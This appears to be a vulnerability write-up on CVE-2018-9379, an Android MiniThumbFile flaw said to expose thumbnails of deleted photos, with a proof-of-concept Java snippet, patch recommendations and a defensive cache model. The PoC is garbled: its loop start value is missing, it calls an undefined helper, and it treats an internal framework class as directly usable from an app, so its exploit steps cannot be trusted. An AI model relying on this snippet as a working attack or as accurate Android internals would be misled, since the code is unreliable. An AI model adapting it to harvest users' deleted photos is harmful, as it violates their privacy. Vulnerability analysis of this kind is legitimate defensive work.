In this post, we will present a detailed analysis of CVE-2018-9379, a security vulnerability affecting multiple functions of the MiniThumbFile.java class in the Android framework. This vulnerability could allow an attacker to view the thumbnails of deleted photos by exploiting a confused deputy situation, leading to local information disclosure without requiring any additional execution privileges. It is important to note that user interaction is not necessary for the exploitation of this vulnerability.
Original References: Android Security Bulletin - August 2018, CVE-2018-9379 Detail
Vulnerability Details
In Android, the MiniThumbFile.java class manages storage of, and access to, the thumbnail images corresponding to media files (such as photos and videos). These thumbnail images are stored in a separate cache located at /data/system_ce//thumbnails/thumbcache.idx and /data/system_ce//thumbnails/thumbcache..
remove(long id)
By exploiting this vulnerability, an attacker can view the thumbnails of deleted photos. This is possible because of a confused deputy situation where an unauthorized application can request the thumbnail of a deleted photo, and the system will provide it if the thumbnail still exists in the cache.
Proof of Concept (PoC) Code Snippet
The following code snippet shows the basic steps to exploit the CVE-2018-9379 vulnerability in an Android application:
    import android.media.MiniThumbFile;
    import android.graphics.Bitmap;

    public class ExploitCVE20189379 {
        public static void main(String[] args) {
            // Get the singleton instance of MiniThumbFile
            MiniThumbFile thumbFile = MiniThumbFile.instance("/data/system_ce//thumbnails/thumbcache.idx");
            // Iterate through possible IDs of deleted photos
            for (long id = ; id < MAX_ID; id++) {
                // Retrieve the thumbnail from the cache using the ID
                Bitmap thumbnail = thumbFile.getMiniThumbFromFile(id);
                // Check if the thumbnail exists
                if (thumbnail != null) {
                    // Save the thumbnail to the local storage
                    saveThumbnailLocally(thumbnail, id);
                }
            }
        }
    }
This proof of concept assumes that an attacker knows the maximum possible ID (MAX_ID) and has access to the /data/system_ce//thumbnails/thumbcache.idx directory.
By running the code snippet in an Android application, an attacker would be able to save local copies of the thumbnails of deleted photos.
Recommendations
To prevent exploitation of this vulnerability, it is recommended to apply the necessary security patches provided by the Android Security Bulletin - August 2018. The following commit provides a patch to address the issue in AOSP:
- Commit 022b3a5 - Prevent confused deputy attacks in MiniThumbFile.java
By properly validating the access requests made by applications to the thumbnail cache, Android can prevent unauthorized access to the thumbnail images of deleted photos.
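The stale-cache condition and the two mitigations discussed above (clearing the cached entry when the photo is deleted, and validating a request before serving it), as an added example that is not the AOSP code or the referenced patch. ThumbCacheModel and all of its method names are hypothetical, the thumbnail bytes are constructed, and the cache is modelled as an in-memory map rather than the on-disk file.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

// Hypothetical in-memory model of an ID-keyed thumbnail cache (not AOSP code).
public class ThumbCacheModel {
    private final Map<Long, byte[]> slots = new HashMap<>(); // media id -> thumbnail
    private final Set<Long> liveMedia = new HashSet<>();     // ids still in the media store

    void addPhoto(long id, byte[] thumb) {
        liveMedia.add(id);
        slots.put(id, thumb.clone());
    }
    // Weak delete: drops the media record but leaves the cached thumbnail behind.
    void deleteWeak(long id) { liveMedia.remove(id); }
    // Hardened delete: zero and remove the cache entry together with the record.
    void deleteHardened(long id) {
        liveMedia.remove(id);
        byte[] old = slots.remove(id);
        if (old != null) Arrays.fill(old, (byte) 0);
    }
    // Weak read: serves whatever is cached under the id.
    byte[] readWeak(long id) { return slots.get(id); }
    // Hardened read: refuses ids whose media record no longer exists.
    byte[] readHardened(long id) { return liveMedia.contains(id) ? slots.get(id) : null; }
    // Audit: cache entries with no matching media record (stale thumbnails).
    Set<Long> orphans() {
        Set<Long> stale = new HashSet<>(slots.keySet());
        stale.removeAll(liveMedia);
        return stale;
    }

    public static void main(String[] args) {
        ThumbCacheModel cache = new ThumbCacheModel();
        byte[] thumb = {1, 2, 3}; // constructed sample thumbnail bytes
        cache.addPhoto(7L, thumb);
        cache.addPhoto(8L, thumb);
        cache.deleteWeak(7L);
        cache.deleteHardened(8L);
        System.out.println("stale entries after deletes: " + cache.orphans());
        System.out.println("weak read of id 7 served:     " + (cache.readWeak(7L) != null));
        System.out.println("hardened read of id 7 served: " + (cache.readHardened(7L) != null));
        System.out.println("weak read of id 8 served:     " + (cache.readWeak(8L) != null));
    }
}
```

The orphans() audit is the check to keep after patching: any id it returns is a thumbnail that outlived its photo.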
Summary
CVE-2018-9379 exposes a vulnerable portion of Android's code that allows potential attackers to view the thumbnails of deleted photos without the user's knowledge. With no additional execution privileges needed, this vulnerability could result in local information disclosure. We strongly recommend updating your Android system with the appropriate security patches to rectify this issue.
Timeline
Published on: 01/17/2025 23:15:11 UTC
Last modified on: 03/13/2025 20:15:13 UTC